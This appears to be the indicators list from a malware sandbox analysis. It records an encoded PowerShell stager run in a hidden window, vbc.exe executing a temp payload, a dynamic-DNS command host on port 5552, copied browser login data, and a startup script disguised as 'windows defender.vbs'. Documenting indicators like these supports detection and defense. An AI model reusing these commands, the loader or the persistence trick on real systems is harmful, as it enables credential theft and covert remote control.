Technical Information
- $asxzdbjdfdfdf.replace(}}}} as /
- %WINDIR%\microsoft.net\framework\v2.0.50727\vbc.exe
- %TEMP%\login data
- %TEMP%\2076956
- %TEMP%\login data
- %TEMP%\2076956
- 'xo###.ddns.net':5552
- DNS ASK xo###.ddns.net
- '%WINDIR%\microsoft.net\framework\v2.0.50727\vbc.exe' -f "%TEMP%\2076956" (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -enc JABBAFMAWABaAGQAYgBqAGQAZgBkAGYAZABmACAAPQAgAEAAJwANAAoAaABeAF4AXgBeAHAAOgB9AH0AfQB9AH0AfQB9AH0AdwB3AHcALgA0AHUAcAA0AC4AYwBvAG0AfQB9AH0AfQB1AHAAbABvAGEAZABzAH0AfQB9AH0AZgBpAGwAZQBf...' (with hidden window)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\vbc.exe' -f "%TEMP%\2076956"
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\windows defender.vbs"